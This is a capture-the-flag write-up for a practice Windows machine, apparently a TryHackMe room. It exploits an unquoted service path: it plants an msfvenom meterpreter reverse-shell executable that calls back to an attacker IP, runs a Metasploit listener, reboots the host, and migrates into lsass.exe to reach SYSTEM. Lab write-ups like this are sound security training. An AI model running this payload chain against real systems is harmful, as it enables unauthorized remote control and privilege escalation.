# Quotient

## Nmap

```
sudo nmap 10.10.75.30 -Pn -sV -sS 

PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

### RDP Login

Starting out we connect via RDP with the credentials provided by the room.

```
xfreerdp /v:'10.10.75.30' /u:'sage' /p:'gr33ntHEphgK2&V' +clipboard /dynamic-resolution
```

### Powerup

Now connected to the target system as the user sage we execute `Invoke-AllChecks` with `Powerup` and identify a binary service with an unquoted path that executes in the context of SYSTEM.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fkir4BBalHZ9UspPkgzm6%2Fimage.png?alt=media\&token=02ac6b43-0242-451b-9866-12c2ff3bab05)

### Unquoted Service Path

Viewing the file permissions in the path `C:\Program Files\Development Files\Devservice Files\Service.exe`  we see that we do not have permission over service.exe, but the Users principal does have the ability to create files within `C:\Program Files\Development Files`.

This is enough for us to perform the unquoted service path privilege escalation vector.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F3wx8dhqjA1hTOMrJq631%2Fimage.png?alt=media\&token=8b366d41-38ea-48e6-a210-5424fc7a2f19)

Due to the way Windows searches for binaries that are not wrapped in quotes with spaces, the system will search for an executable in the following order when the service is started.

1. C:\Program.exe
2. C:\Program Files\Development.exe
3. C:\Program Files\Development Files\Devservice.exe
4. C:\Program Files\Development Files\Devservice Files\Service.exe

As we have write access to `C:\Program Files\Development Files` we will be targeting option number 3.

### Building the attack

Firstly to perform the attack we create a `meterpreter` reverse shell called `Devservice.exe`

```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.11.54.237 LPORT=80 -f exe -o Devservice.exe 
```

After the payload is built we then upload it to the target system and place the executable in `C:\Program Files\Development Files\Devservice.exe` . We do not have permission to restart the service, we do however have the ability to restart the target system.

Start a listener with `Metasploit`.

```
sudo msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.11.54.237; set lport 80; exploit"
```

### Triggering the payload

Then reboot the target system. After a minute or two we should receive a shell back.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FZTNkJUmwXV5fgi1eESI1%2Fimage.png?alt=media\&token=7af50230-8151-4ca0-a506-27a8dd9ed48a)

For some reason my `meterpreter` shell would soon die after connecting. As such I migrated to an alternative process (lsass.exe).

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FTcJV0kZPM5vv8dT57kre%2Fimage.png?alt=media\&token=aecb9953-8f75-4c11-8465-0e38d2038afd)

### Root flag

With confirmed **SYSTEM** level access I was then able to retrieve the administrator's flag.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FHMJ5k3J98ovqDzaaKnf3%2Fimage.png?alt=media\&token=461fc3b5-2006-4ea3-b333-b3a1ff124144)